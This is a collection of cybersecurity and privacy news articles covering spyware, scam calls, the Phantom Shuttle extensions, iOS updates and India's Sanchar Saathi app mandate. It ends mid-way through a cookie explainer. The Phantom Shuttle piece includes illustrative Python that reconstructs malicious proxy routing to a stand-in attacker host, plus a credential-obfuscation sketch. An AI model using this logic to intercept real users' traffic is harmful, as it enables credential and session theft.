Security Specialists Warn That Full Photo Access Can Expose Personal Data


 

Mobile devices have become silent archives of modern life, storing everything from personal family moments to copies of identification documents and work files. That same convenience, however, has made them an attractive target for cyber-espionage.

In a recent security intervention, Google removed several Android applications from the Play Store after investigators discovered they carried a sophisticated strain of spyware known as KoSpy.

It is believed that the malicious software is capable of quietly infiltrating devices, harvesting sensitive information, and transmitting that information back to its operators without the users being aware. 

Researchers attribute the campaign to APT37 and believe the group has used the malware for covert surveillance since at least 2022. Privacy specialists have renewed their warnings that something as common as granting applications broad permissions, especially access to personal photo libraries, can inadvertently open the door to far more invasive forms of digital monitoring.

In addition, the incident highlights how mobile applications obtain and use device permissions. For an Android or iOS application to function properly, it needs access to various components of the smartphone.

These requests generally fall into three categories: install-time permissions, runtime permissions, and a small set of special permissions that prompt the user during application use. Most permissions are straightforward and granted automatically at installation, while others require explicit approval from the user via prompts issued by the operating system.

Operating systems act as intermediaries between an application and the phone's hardware, determining whether an application can access sensitive resources such as the camera, microphone, storage, or location data. 

However, although these controls are designed to maintain functional integrity across applications and to prevent unauthorized interactions between software components, users often approve requests without fully considering the implications.

Malicious or poorly secured applications that abuse runtime and special permissions, the ones that provide deeper access to device data, pose the greatest security risks. Understanding why these permissions matter is central to evaluating the potential impact of spyware such as KoSpy. App permissions essentially function as gatekeeping settings that determine what categories of personal data an application is allowed to collect, process, or transmit.

Legitimate services depend on this access. Messaging platforms such as WhatsApp, for example, require camera and microphone permissions to provide voice and video calls, while navigation tools such as Google Maps use location data to provide real-time directions and localized information.

When these permissions are granted to untrusted software, however, they may also serve as vectors for exploitation. Misused location access could enable unauthorized tracking of a user's movements, exposing them to surveillance risks or even physical safety concerns.

Microphone permissions, if misused, could enable covert audio recording. Social networking platforms, such as Facebook and Instagram, commonly request access to contact lists. By leveraging this data, applications can map social connections as well as run aggressive marketing campaigns, distribute spam, or harvest information. 

The storage permissions necessary to allow apps to read and upload files, such as those required by photo editing and document management software, can also pose a serious privacy concern if granted to applications without a clear functional reason for accessing personal documents. 

Security analysts report that the cumulative effect of these permissions can be significant, especially when malicious software has been specifically designed to take advantage of them to collect covert data. 

Privacy advocates have expressed concerns about mobile permissions in connection with a wide variety of products and services, not just obscure applications and alleged spyware campaigns. Even some of the world's largest technology platforms have faced scrutiny from the privacy community over how data is handled once access has been granted.

In a series of cases cited by digital rights groups, Meta Platforms, the parent company of Facebook, has demonstrated how extensive data access can carry complex privacy implications. The company drew widespread criticism in 2022 after it provided law enforcement with private message records connected to a criminal investigation of a mother and daughter accused of carrying out an abortion.

It has been argued that this case illustrates how personal information stored on major platforms can be obtained through legal process, raising broader questions about how digital information is preserved, analyzed, and ultimately disclosed.

The Surveillance Technology Oversight Project's communications director, Will Owen, believes that such cases demonstrate the ability of technology platforms to facilitate government access to sensitive personal information in circumstances where it is legally required.

Concerns were also raised recently when a Facebook feature asked users to grant the platform access to their device's camera roll so it could automatically suggest photos using artificial intelligence. Users were invited to enable cloud-based processing that analyzed images stored on their devices in order to generate AI-enhanced variants.

Activating such a feature could result in the platform's systems processing photographs and potentially analyzing biometric data such as facial features, according to privacy advocates. Despite the tool being presented as a convenience feature designed to enhance photo sharing, some users expressed concerns regarding its scope of data processing.

The feature does not appear to be widely available, and the company has not publicly clarified its current status. Security experts cite these examples to stress the importance of digital hygiene: even when a feature is presented as an optional enhancement, users should carefully consider what information an application may gain access to.

Facebook, for example, allows users to review and modify camera roll integration in the "Settings and Privacy" menu, which contains options for managing photo suggestions and image sharing. Though these adjustments may seem minor, limiting broad access to personal photo libraries remains an effective safeguard for smartphone users.

A privacy expert notes that restricting such permissions not only reduces the probability of accidental data exposure but also ensures that personal images are not processed, stored, or shared in unintended ways. As smartphones grow more sophisticated, persistent concerns have been raised about how extensively mobile devices can monitor user activity.

Whenever multiple applications run simultaneously, many of them with microphone access, voice recognition capabilities, and digital assistant integration, questions arise over whether smartphones passively listen to conversations in order to serve targeted advertising or notifications.

Despite the fact that modern mobile operating systems include safeguards against unauthorized recording, the discussion points to a broader issue of data governance on personal devices. Whether a permission request is approved depends on both the developer's design and the choices the user makes.

Mobile applications are developed by many kinds of organizations, including large technology companies, independent developers, internal engineering teams, and outsourced development firms. Although most development processes adhere to established security practices, privacy policies, and compliance frameworks, the last layer of control remains with the end user.

Granting permissions indiscriminately enlarges a device's attack surface and can increase its vulnerabilities, particularly when applications request access to resources not directly required for their core functionality. Security specialists therefore emphasize that app installation and permission management should be handled more deliberately.

Checking application ratings, assessing developer credibility, and examining permission requests prior to installation can significantly reduce the risk of installing malicious or poorly designed software. Users should also periodically review the permission management settings available in both Android and iOS to see which applications retain access to sensitive resources such as the microphone, storage, and location services, and to confirm that access is granted only where it clearly supports an application's legitimate function.

Keeping operating systems and applications up-to-date also helps mitigate potential security vulnerabilities that may occur over time. As mobile ecosystems continue to evolve toward increasingly data-driven digital services, developers are expected to adopt more transparency regarding the collection and processing of personal information.

Despite this, cybersecurity professionals consistently emphasize that user behavior is essential to data protection. Because personal devices now store large volumes of sensitive information, disciplined habits remain the most effective way to maintain control over one's digital footprint.

Exercising caution with permissions, installing applications only from trusted marketplaces, and regularly auditing privacy settings remain chief among those habits. Mobile security is no longer limited to antivirus tools or system updates alone.

Since smartphones continue to provide access to personal, financial, and professional information, managing application permissions is becoming increasingly important to everyday cybersecurity practices. 

A number of analysts suggest that users evaluate new apps carefully before downloading them, checking whether the requested permissions align with the service being offered and reconsidering any requests for access that seem excessive or unnecessary.

Best practice suggests tightening permission controls, reviewing privacy settings frequently, and favoring well-established applications from trusted developers in order to reduce the likelihood of covert data collection.

Despite the fact that platforms and developers share responsibility for strengthening protections, experts emphasize that informed and cautious user behavior is still the most effective means of protecting against emerging threats to mobile surveillance.

Silent Scam Calls Used to Verify Active Phone Numbers, Cybersecurity Experts Warn

 

Many people have answered calls from unfamiliar numbers only to hear silence on the other end. In some cases, no one speaks at all. In others, there is a short delay before a caller finally responds. While this may appear to be a simple mistake or a wrong number, cybersecurity experts say these calls are often part of a deliberate scam tactic used to verify active phone numbers. 

According to security specialists, these silent calls function as a form of automated reconnaissance. Fraud operations run large-scale calling systems that dial thousands of numbers to determine which ones belong to real people. When someone answers, the system confirms that the number is active and marks it as a potential target for future scams. 

Keeper Security Chief Information Security Officer Shane Barney explained that such calls are rarely accidental. Instead, they help attackers filter out inactive numbers before investing more time and resources into scams. Verified contact information has value in modern cybercrime networks, where data about reachable individuals can be bought, sold, and reused across different fraud campaigns. 

Once a phone number is confirmed as active, it may be used in several ways. In some cases, scammers follow up with phishing calls or messages designed to trick victims into revealing personal or financial information. In more advanced attacks, a verified phone number could be combined with leaked email addresses from data breaches or used in schemes such as SIM-swap fraud, where attackers attempt to gain control of a victim’s mobile account. 

Another variation occurs when callers respond only after a brief pause. This delay is typically caused by predictive dialing systems that automatically place large volumes of calls. These systems detect when a human answers and then route the call to a live operator. The short silence represents the time it takes for the system to transfer the connection. 

Some people also worry that speaking during these calls could allow scammers to clone their voice using artificial intelligence. While voice cloning technology exists, experts say creating a convincing replica generally requires longer and clearer audio samples than a brief greeting. 

However, voice cloning could still become part of larger scams if criminals already possess other personal details about a victim. Security professionals recommend simple precautions when receiving suspicious calls. If an unknown number produces silence, hanging up immediately is usually the safest option. 

Another tactic is answering without speaking, which prevents automated systems from detecting a human voice. Spam-filtering tools can also help reduce nuisance calls. Applications such as Truecaller, RoboKiller, and Hiya identify numbers previously reported as spam. However, experts caution that no filtering system is perfect because scammers frequently change phone numbers. 

Ultimately, while call-blocking tools can reduce the volume of unwanted calls, maintaining strong account security and being cautious with unknown callers remain the most effective ways to avoid phone-based scams.

WhatsApp Launches High-Security Mode for Ultimate User Protection

 

WhatsApp has launched a new high-security mode called "Strict Account Settings," providing users with enhanced defenses against sophisticated cyber threats. This feature, introduced on January 27, 2026, allows one-click activation and builds on the platform's existing end-to-end encryption. It targets high-risk individuals like journalists and public figures facing advanced attacks, marking WhatsApp as the third major tech firm to offer such protections after Apple's Lockdown Mode and Google's Advanced Protection.

The mode activates multiple safeguards simultaneously through a simple toggle in WhatsApp settings under Privacy > Advanced. It blocks media files and attachments from unknown senders, preventing potential malware delivery via images or documents. Link previews—thumbnails that appear for shared URLs—are disabled to eliminate risks from embedded tracking or exploits, while calls from unknown numbers are automatically silenced, appearing only in missed calls.

These measures address common attack vectors identified in cyber surveillance campaigns. For instance, malicious attachments and link previews have been exploited in spyware incidents targeting activists and reporters. By muting unknown calls, the feature reduces social engineering attempts like vishing scams, where attackers impersonate contacts to extract information. WhatsApp's blog emphasizes that while everyday users benefit from standard encryption, this mode offers "extreme safeguards" for rare, high-sophistication threats.

Like its competitors' offerings, Strict Account Settings trades convenience for security, limiting app functionality in exchange for greater protection. Apple's Lockdown Mode, available since 2022, restricts attachments and browser features, while Google's Android equivalent blocks risky app downloads. Cybersecurity experts have welcomed WhatsApp's step, calling it a "very welcome development" for civil society defenders. The rollout is global on iOS and Android, with full availability expected in the coming weeks.

As cyber threats evolve with AI-driven attacks and state-sponsored hacking, features like this empower users to customize defenses. High-risk professionals can now layer protections without switching apps, fostering safer digital communication. However, Meta advises reviewing settings post-activation, as it may block legitimate interactions from new contacts. This move aligns with rising demands for privacy amid global data scandals.

Google Issues Urgent Privacy Warning for 1.5 Billion Photos Users

 

Google has issued a critical privacy alert for its 1.5 billion Google Photos users following accusations of using personal images to train AI models without consent. The controversy erupted from privacy-focused rival Proton, which speculated that Google's advanced Nano Banana AI tool scans user libraries for data. Google has quickly denied the claims, emphasizing robust safeguards for user content. 

Fears have mounted as Google rapidly expands artificial intelligence in Photos to include features such as Nano Banana, which turns any image into an animation. Using the feature is fun, but critics note that it processes photos via cloud servers, which raises concerns about data retention and possible misuse. Incidents like last year's Google Takeout bug, which made other people's videos appear in the exports of those downloading their data, have fed skepticism about the security of the platform.

Google explained that, unless users explicitly share their photos and videos, it does not use personal media to train generative AI models like Gemini. It also acknowledged that Photos lacks end-to-end encryption, instead performing automated scans for child exploitation material supplemented by professional review. This transparency aims to rebuild trust as viral social media trends amplify Nano Banana's popularity.

According to security experts, users are seeing wider impacts as the AI integration expands across Google services, echoing recent Gmail data training refusals. Proton and experts advise caution, suggesting users check their privacy dashboards and limit what they upload to the cloud. With billions of images on the line, this cautionary tale highlights the push and pull between innovation and data privacy in cloud storage.

To mitigate risks, enable two-factor authentication, keep local backups, or consider encrypted options like Proton Drive. While Google continues to patch vulnerabilities, users should remain vigilant as threats evolve and become more AI-driven. Amid increasing scrutiny, this incident serves as a stark reminder of the need for clearer guidelines in an age of ubiquitous AI-powered photo processing.

Phantom Shuttle Chrome Extensions Caught Stealing Credentials

 

Two malicious Chrome extensions named Phantom Shuttle have been discovered posing as proxy and network testing tools while stealing browsing traffic and private information from users' browsers without their knowledge.

According to security researchers at Socket, these extensions have been around since at least 2017 and were still present in the Chrome Web Store at the time of writing. This raises serious concerns about the dangers of browser extensions, even those obtained from reputable sources.

Analysis by Socket indicates that the Phantom Shuttle extensions direct victims' online traffic to a proxy setup controlled by the attackers, using hardcoded credentials. The attackers hid the malicious code by prepending it to a legitimate jQuery library.

The hardcoded proxy credentials are also obfuscated using a custom character index-based encoding scheme, which hampers detection and reverse engineering. A built-in traffic listener in the extensions is capable of intercepting HTTP authentication challenges on multiple websites.
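Socket has not published the malware's exact decoder, so the sketch below only illustrates the general technique: a character index-based encoding stores each character of a secret as its position in a fixed alphabet string. The alphabet, function names, and credential value here are hypothetical.

```python
# Hypothetical sketch of a character index-based encoding, the
# general obfuscation technique described above. The alphabet and
# the credential string are invented for illustration.
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789:@."

def obfuscate(secret: str) -> list[int]:
    """Store each character as its index into the fixed alphabet."""
    return [ALPHABET.index(ch) for ch in secret]

def deobfuscate(indices: list[int]) -> str:
    """Rebuild the secret by looking each index back up."""
    return "".join(ALPHABET[i] for i in indices)

encoded = obfuscate("user:pass@proxy.example")
assert deobfuscate(encoded) == "user:pass@proxy.example"
```

An encoding like this defeats naive string scanning of an extension's source, but it is trivially reversible once the alphabet and index list are recovered, which is why analysts treat it as obfuscation rather than encryption.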

Modus operandi 

To force traffic through its infrastructure, Phantom Shuttle dynamically modifies Chrome’s proxy configuration using an auto-configuration script. In a default mode labeled “smarty,” the extensions allegedly route more than 170 “high-value” domains through the proxy network, including developer platforms, cloud consoles, social media services, and adult sites. Additionally, to avoid breaking environments that could expose the operation, the extensions maintain an exclusion list that includes local network addresses and the command-and-control domain. 
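Chrome proxy auto-configuration scripts are written in JavaScript, but the selective routing behavior described above can be sketched in Python. The domain names below are hypothetical placeholders, not the extension's actual target or exclusion lists.

```python
# Sketch of PAC-style routing logic: send "high-value" domains
# through the attacker-controlled proxy, pass excluded hosts
# (local network, command-and-control) straight through so the
# operation is not exposed. All domain names are hypothetical.
HIGH_VALUE = {"console.cloud.example.com", "github.example.com"}
EXCLUSIONS = {"localhost", "127.0.0.1", "c2.attacker.example"}

def find_proxy(host: str) -> str:
    """Mimic a PAC FindProxyForURL decision for a hostname."""
    if host in EXCLUSIONS or host.endswith(".local"):
        return "DIRECT"  # never intercepted, avoids breakage
    if host in HIGH_VALUE:
        return "PROXY proxy.attacker.example:8080"  # intercepted
    return "DIRECT"  # ordinary browsing stays untouched
```

Routing only selected domains while letting everything else pass directly keeps the victim's browsing experience normal, which is part of why such extensions can persist unnoticed for years.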

Because the extensions operate as a man-in-the-middle, they can capture data submitted through forms, including credentials, payment card data, and other personal information. Socket says the extensions can also steal session cookies from HTTP headers and parse API tokens from requests, potentially enabling account takeover even when passwords are not directly harvested.

Mitigation tips 

Chrome users are advised to download extensions only from trusted developers, to check user reviews, and to pay attention to the permissions requested at installation. In sensitive workload environments (cloud administration, developer portals, finance tools), minimizing extensions and removing those not in use can also dramatically reduce exposure to similar proxy-based credential theft.

Apple Forces iOS 26 Upgrade Amid Active iPhone Security Threats

 

Apple has taken an unusually firm stance on software updates by effectively forcing many iPhone users to move to iOS 26, citing active security threats targeting devices in the wild. The decision marks a departure from Apple’s typical approach of offering extended security updates for older operating system versions, even after a major new release becomes available.

Until recently, it was widely expected that iOS 18.7.3 would serve as a final optional update for users unwilling or unable to upgrade to iOS 26, particularly those with newer devices such as the iPhone 11 and above. Early beta releases appeared to support this assumption, with fixes initially flagged for a broad range of devices. That position has since changed. 

Apple has now restricted key security fixes to older models, including the iPhone XS, XS Max, and XR, leaving newer devices with no option other than upgrading to iOS 26 to remain protected. Apple has confirmed that the vulnerabilities addressed in the latest updates are actively being exploited. The company has acknowledged the presence of mercenary spyware operating in the wild, targeting specific individuals but carrying the potential to spread more widely over time. These threats elevate the importance of timely updates, particularly as spyware campaigns increasingly focus on mobile platforms. 

The move has surprised industry observers, as iOS 18.7.3 was reportedly compatible with newer hardware and could have been released more broadly. Making the update available would likely have accelerated patch adoption across Apple’s ecosystem. Instead, Apple has chosen to draw a firm line, prioritizing rapid migration to iOS 26 over backward compatibility.

Resistance to upgrading remains significant. Analysts estimate that at least half of eligible users have not yet moved to iOS 26, citing factors such as storage limitations, unfamiliar design changes, and general update fatigue. While only a small percentage of users are believed to be running devices incompatible with iOS 26, a far larger group remains on older versions by choice. This creates a sizable population potentially exposed to known threats. 

Security firms continue to warn about the risks of delayed updates. Zimperium has reported that more than half of mobile devices globally run outdated operating systems at any given time, a condition that attackers routinely exploit. In response, U.S. authorities have also issued update warnings, reinforcing the urgency of Apple’s message. 

Beyond vulnerability fixes, iOS 26 introduces additional security enhancements. These include improved protections in Safari against advanced tracking techniques, safeguards against malicious wired connections similar to those highlighted by transportation security agencies, and new anti-scam features integrated into calls and messages. Collectively, these changes reflect Apple’s broader push to harden iPhones against evolving threat vectors. 

With iOS 26.3 expected in the coming weeks, users who upgrade now are effectively committing to Apple’s new update cadence, which emphasizes continuous feature and security changes rather than isolated patches. Apple has also expanded its ability to deploy background security updates without user interaction, although it remains unclear when this capability will be used at scale. 

Apple’s decision underscores a clear message: remaining on older software versions is no longer considered a safe or supported option. As active exploitation continues, the company appears willing to trade user convenience for faster, more comprehensive security coverage across its device ecosystem.

India’s Spyware Policy Could Reshape Tech Governance Norms


 

Several months ago, India's digital governance landscape was jolted by an unusual experiment in state control over personal devices, one that briefly shifted the conversation from telecommunication networks to the mobile phones carried in consumers' pockets.

The government instructed that all mobile handsets intended for the Indian market ship with a pre-installed, state-developed security application called Sanchar Saathi, an initiative the Indian Government positioned as a technological shield against mobile phone crime.

According to its promotional materials, Sanchar Saathi (which translates to "Communication Partner") was created to help users counter mobile phone theft, financial fraud, spam, and other mobile-led scams that have outpaced traditional policing.

Further, the Department of Telecommunications (DoT), the regulatory authority overseeing the mandate, stated that the application's core functionalities could neither be disabled nor restricted by end users, effectively making it a permanent component of the device's operating environment.

Device makers were given a 120-day deadline to submit a detailed compliance report, including a system-level integration assessment and an audit confirmation. The order, originally defended on cybersecurity grounds, quickly encountered a wave of public and political opposition.

Opposition leaders, privacy advocates, and digital-rights organizations questioned the proportionality of the measure and the inherent risks of compulsory, non-removable state applications on personal devices, warning that such software could be used to collect mass data, track real-time locations, and continuously profile people's behavior.

It did not take long for the Department of Telecommunications to retract the mandatory installation requirement, stating that users had already widely adopted the application and that mandatory pre-installation was therefore unnecessary. The swift withdrawal failed to quell the wider unrest; instead, it amplified fears that the policy reflected a deeper intention to normalize state access to private hardware under the rhetoric of crime prevention.

Many commentators pointed out uneasy similarities between this situation and the surveillance state described in George Orwell's 1984, where constant oversight is simply the default state of affairs. Several feared the episode signaled an eventual future in which individuals lose control over their personal technology to government-defined security priorities.

Many experts, however, believe the controversy involves not just a single application but the precedent it sets, one that raises fundamental questions about the role of the state in personal technology and the limits of citizens' privacy in the world's largest democracy.

The mandate also extended beyond new inventory: handsets already in circulation were to receive the government application through software updates, and the accompanying provisions made explicit that neither users nor manufacturers could disable, limit, or obstruct its core functionalities.

The directive, conceived as a measure to strengthen cyber intelligence and combat cyber fraud, has sparked a widening debate among security researchers, civil-rights advocates, and technology policy experts over the past few months. These critics warn that compulsory, non-removable state applications would profoundly alter India's approach to digital governance, blurring longstanding boundaries between security objectives and individual control over private technology.

On Wednesday, the Indian government abruptly reversed course and withdrew the directive that had instructed global smartphone manufacturers such as Apple and Samsung to embed the state-developed security application in all mobile handsets sold in the country.

The reversal followed a two-day backlash in which opposition lawmakers and digital-rights organizations claimed that the Sanchar Saathi application, whose name means "Communication Partner" in Hindi, was intended not for security but for state surveillance.

Critics from across the political aisle and privacy advocacy groups had publicly attacked the directive as an excessive intrusion into personal devices, claiming that the government was planning to "snoop on citizens through their phones."

In response to mounting criticism, the Ministry of Communications issued a statement Wednesday afternoon confirming that the government had decided not to impose mandatory pre-installation and clarifying that manufacturers would no longer be bound by the order. The original directive had been circulated confidentially to device makers late last month and came to public attention only after it was leaked to domestic media on Monday.

Under the order, new handsets were required to comply within 90 days of its release, and previously sold devices were to comply via software updates. The order explicitly stated that key functions of the app could not be disabled or restricted.

Although the ministry had framed the policy as protecting the nation's digital security, its quiet withdrawal marks a rare moment in which external scrutiny reshaped the state's digital policy calculus, underscoring how contested control over personal technology has become in the world's second-largest mobile market. 

As first circulated to industry stakeholders, the directive set a narrow compliance window for new devices and a much more stringent requirement for handsets already in use. Manufacturers were given 90 days to ensure that all new units, whether produced domestically or imported into India, carried the Sanchar Saathi application by default. 

For unsold devices already in retail and distribution pipelines, companies were instructed to deliver the software retroactively through system updates, ensuring the app's presence across the entire supply chain. Had it been enforced, the policy would have standardized the tool throughout one of the world's largest mobile markets. 

India has more than 735 million smartphone users. Government officials defended the mandate as a consumer-protection imperative, arguing that it was needed to shield consumers from telecom fraud based on duplicate or cloned IMEI numbers, the 15-digit identification codes that serve as the primary device identifiers on mobile networks. 
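As background on how IMEI numbers are structured: an IMEI is normally quoted as 15 digits, the last of which is a Luhn check digit. The sketch below (an illustrative validator, not part of Sanchar Saathi) shows how that checksum is verified; note that the Luhn check only catches typos and crude tampering, which is why a well-formed cloned IMEI still passes it and requires registry-level detection of the kind the government described.

```python
def luhn_valid(number: str) -> bool:
    """Verify a digit string with the Luhn algorithm used by IMEIs.

    The check catches mistyped or crudely altered numbers, but a
    cloned IMEI copied digit-for-digit will still validate.
    """
    if not number.isdigit():
        return False
    total = 0
    # Double every second digit from the right; subtract 9 if > 9.
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


# Sample 15-digit value (checksum verified by hand):
print(luhn_valid("490154203237518"))  # True
print(luhn_valid("490154203237519"))  # False: last digit altered
```

This is why duplicate-IMEI fraud is detected by cross-referencing a central registry rather than by any property of the number itself.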

Linked to a centralized registry, the Sanchar Saathi platform lets users report missing smartphones, block stolen devices, flag suspicious network access, and report fraudulent mobile communications. 

Officials also pointed to the app's track record: according to government data, since its launch in January the app has helped block more than 3.7 million lost or stolen phones and terminate over 30 million illicit mobile connections, including those used in telecom scams and identity fraud. 

Even so, the mandate put India at odds with Apple, a company with a long history of refusing to preload government and third-party applications on its products, citing ecosystem integrity and operating system security. 

Despite Apple's relatively small 4.5% share of the Indian smartphone market, the company carries disproportionate weight in global discussions about secure device architectures. Several industry insiders noted that Apple's internal policies prohibit installing external software before retail sale, making regulatory friction a probable outcome. 

Early expectations in industry circles were that New Delhi would eventually soften the pre-installation requirement, replacing it with optional installation prompts or software nudges delivered at the operating system level. A security researcher who spoke on condition of anonymity argued that negotiations could lead to a midpoint. 

"Rather than imposing a mandate, they might settle for a nudge," the researcher said, echoing broader industry assumptions that the policy would prove more malleable in practice than it initially appeared. Privacy advocates, however, argued that the order's short lifespan did not diminish its significance. 

Civil society organizations have warned that mandatory, non-removable state applications, even when presented as essential anti-fraud tools, risk normalizing a level of technical authority over individual devices that extends well beyond the prevention of telecom crimes. 

Observers quickly drew comparisons to Russia's recent requirement that a state-backed messaging application be embedded in smartphones, and to similar software-standardization efforts in Russia-aligned regulatory environments. "The government removes user consent as a meaningful choice," said Mishi Choudhary, a lawyer specializing in technology rights, encapsulating the core argument from digital rights groups.

The Ministry of Communications, which issued the order on a confidential basis, declined to publicly release the full directive or make substantive comments on privacy concerns even after it was leaked to Indian media. Critics contend that this silence compounded fears, leaving an impression of regulatory overreach untempered by clarified safeguards. 

Even after the government announced it would no longer enforce the pre-installation requirement, the episode continued to raise questions about transparency in cybersecurity policymaking, the future of digital consent, and the precedent set when state security frameworks reach into the software layer of personal hardware in a democracy already grappling with rapid digitization and fragile public trust. 

A number of technology policy analysts also issued pointed warnings about the mandate, arguing that the risks lay not in the application's stated purpose but in the level of access it might command in the future. 

Prasanto K. Roy, a specialist in India's digital infrastructure who has long studied the country's regulatory impulses, characterized the directive as an example of a larger problem: the lack of transparency about what state-mandated software might ultimately be allowed to do on users' hardware. 

In an interview, Roy said that while Sanchar Saathi's internal workings remain unclear to the public, the permissions it seeks warrant caution. "We are not sure exactly what it is doing, but we can see that it is asking for a lot of permissions, from the flashlight to the camera, which suggests it has the potential to access almost everything." 

“That alone is problematic,” he added, reflecting a growing consensus among cybersecurity researchers that expansive access requests carry structural risks when they are connected to applications that aren’t subject to independent audits or external oversight, even when explained as security prerequisites. 

According to its Google Play Store declaration, the application neither collects nor shares user data, a claim the government cited in its initial defense of the policy. The government's otherwise limited public communication around the order, however, exacerbated questions about consent and scope. 

A BBC spokesperson confirmed that the broadcaster has formally contacted the Department of Telecommunications seeking clarification on both the application's privacy posture and what safeguards, if any, would apply to future updates and changes to its backend capabilities. 

Roy also highlighted that the compliance requirements conflict directly with long-standing policies of most global handset manufacturers, particularly Apple, which has historically resisted embedding government or third-party applications at the point of sale and is unlikely to change course. 

"The vast majority of handset manufacturers prohibit the installation of any government app or any external app before a handset is sold - except for the Chinese and Russian companies," Roy stated, adding that the Indian order would effectively have forced manufacturers to deviate from long-established operating norms. 

Although Android dominates the Indian smartphone market, Apple's share, estimated at 4.5 percent by mid-2025, has become central to the policy's geopolitical undertones. Apple has not issued a public statement about compliance, but it has been reported that the company did not intend to comply. 

According to a Reuters report, Apple did not intend to comply with the directive and planned to communicate its concerns to the Indian government in writing. 

The Indian directive is not entirely without international precedent, though the comparison did little to soften its reception. In August 2025, Russian media reported that all mobile phones and tablets sold domestically must carry the government-endorsed MAX messenger application, sparking a similar debate about surveillance risks and digital autonomy. 

The episode placed India among a small but notable group of nations that have tightened device-verification rules through software-based enforcement rather than relying on telecom operators or network intermediaries. That parallel deepened, rather than eased, privacy advocates' concerns. 

It reinforced the belief that cybersecurity policies relying on mandatory software, broad permissions, and silent updates, without transparent guardrails, risk recalibrating the balance between fraud prevention and individual digital sovereignty.

The mandate's brief rise and fall will likely outlast the order itself, leaving a policy inflection point that legislators, courts, and technology companies cannot ignore. The episode illustrates a central truth of modern security: once software becomes a regulatory instrument, the debate shifts from intention to capability, and from reassurance to verification. 

Governments globally face legitimate pressure to curb digital fraud, secure device identities, and defend telecom infrastructure. Experts argue, however, that trust is strengthened not by force but by transparency, technical auditability, and clearly defined mandates anchored in law rather than ambiguity.

For India, the controversy presents an opportunity not to retreat but to recalibrate. According to analysts, cybersecurity frameworks governing consumer devices should include public rule disclosures, third-party security assessments, granular consent architectures, and sunset clauses for state-mandated software updates. 

Digital rights groups have also urged that future anti-fraud tools rely on opt-in activation, data minimization standards, and local on-device processing, rather than silent server-side updates without user notification.

The Sanchar Saathi debate has also raised larger questions for democracies navigating mass digitization: who owns the software layer on personal hardware, and how far can security imperatives extend before personal autonomy contracts? 

There is a growing consensus that the answers will define the next decade of India's digital social contract, determining how innovation, security, and privacy coexist not just through negotiation, but through design.

Swiss Startup Soverli Introduces a Sovereign OS Layer to Secure Smartphones Beyond Android and iOS

 

A Swiss cybersecurity startup, Soverli, has introduced a new approach to mobile security that challenges how smartphones are traditionally protected. Instead of relying solely on Android or iOS, the company has developed a fully auditable sovereign operating system layer that can run independently alongside existing mobile platforms. The goal is to ensure that critical workflows remain functional even if the underlying operating system is compromised, without forcing users to abandon the convenience of modern smartphones. 

Soverli’s architecture allows multiple operating systems to operate simultaneously on a single device, creating a hardened environment that is logically isolated from Android or iOS. This design enables organizations to maintain operational continuity during cyber incidents, misconfigurations, or targeted attacks affecting the primary mobile OS. By separating critical applications into an independent software stack, the platform reduces reliance on the security posture of consumer operating systems alone. 

Early adoption of the technology is focused on mission-critical use cases, particularly within the public sector. Emergency services, law enforcement agencies, and firefighting units are among the first groups testing the platform, where uninterrupted communication and system availability are essential. By isolating essential workflows from the main operating system, these users can continue operating even if Android experiences failures or security breaches. The same isolation model is also relevant for journalists and human rights workers, who face elevated surveillance risks and require secure communication channels that remain protected under hostile conditions.  

According to Soverli’s leadership, the platform represents a shift in how mobile security is approached. Rather than assuming that the primary operating system will always remain secure, the company’s model is built around resilience and continuity. The sovereign layer is designed to stay operational even when Android is compromised, while still allowing users to retain the familiar smartphone experience they expect. Beyond government and critical infrastructure use cases, the platform is gaining attention from enterprises exploring secure bring-your-own-device programs. 

The technology allows employees to maintain a personal smartphone environment alongside a tightly controlled business workspace. This separation helps protect sensitive corporate data without intruding on personal privacy or limiting device functionality. The system integrates with mobile device management tools and incorporates auditable verification mechanisms to strengthen identity protection and compliance. The underlying technology was developed over four years at ETH Zurich and does not require specialized hardware modifications. 

Engineers designed the system to minimize the attack surface for sensitive applications while encrypting data within the isolated operating system. Users can switch between Android and the sovereign environment in milliseconds, balancing usability with enhanced security. Demonstrations have shown secure messaging applications operating inside the sovereign layer, remaining confidential even if the main OS is compromised. Soverli’s approach aligns with Europe’s broader push toward digital sovereignty, particularly in areas where governments and enterprises demand auditable and trustworthy infrastructure. 

Smartphones, often considered a weak link in enterprise security, are increasingly being re-evaluated as platforms capable of supporting sovereign-grade protection without sacrificing usability. Backed by $2.6 million in pre-seed funding, the company plans to expand its engineering team, deepen partnerships with device manufacturers, and scale integrations with enterprise productivity tools. Investors believe the technology could redefine mobile security expectations, positioning smartphones as resilient platforms capable of operating securely even in the face of OS-level compromise.

Cookies Explained: Accept or Reject for Online Privacy

 

Online cookies sit at the centre of a trade-off between convenience and privacy, and those “accept all” or “reject all” pop-ups are how websites ask for your permission to track and personalise your experience. Understanding what each option means helps you decide how much data you are comfortable sharing.

Role of cookies 

Cookies are small files that websites store on your device to remember information about you and your activity. They can keep you logged in, remember your preferred settings, or help online shops track items in your cart. 
  • Session cookies are temporary and disappear when you close the browser or after inactivity, supporting things like active shopping carts. 
  • Persistent cookies remain for days to years, recognising you when you return and saving details like login credentials. 
  • Advertisers use cookies to track browsing behaviour and deliver targeted ads based on your profile.
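The difference between session and persistent cookies comes down to attributes the server sets on the `Set-Cookie` response header. As a minimal illustration (the cookie names here are invented for the example), Python's standard `http.cookies` module can show both kinds:

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()

# Session cookie: no Expires/Max-Age attribute, so the browser
# discards it when the browsing session ends.
cookie["session_id"] = "abc123"
cookie["session_id"]["httponly"] = True  # hidden from page scripts

# Persistent cookie: Max-Age (in seconds) keeps it for 30 days,
# letting the site recognise the visitor on a return visit.
cookie["lang"] = "en-GB"
cookie["lang"]["max-age"] = 30 * 24 * 3600
cookie["lang"]["samesite"] = "Lax"  # limit cross-site sending

# Each entry becomes one Set-Cookie response header line.
print(cookie.output())
```

The key point is that persistence is purely a matter of the `Max-Age` (or `Expires`) attribute; delete it and the same cookie becomes session-only.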
Essential vs non-essential cookies

Most banners state that a site uses essential cookies that are required for core functions such as logging in or processing payments. These cannot usually be disabled because the site would break without them. 

Non-essential cookies generally fall into three groups:
  • Functional cookies personalise your experience, for example by remembering language or region.
  • Analytics cookies collect statistics on how visitors use the site, helping owners improve performance and content.
  • Advertising cookies, often from third parties, build cross-site, cross-device profiles to serve personalised ads.

Accept all or reject all?

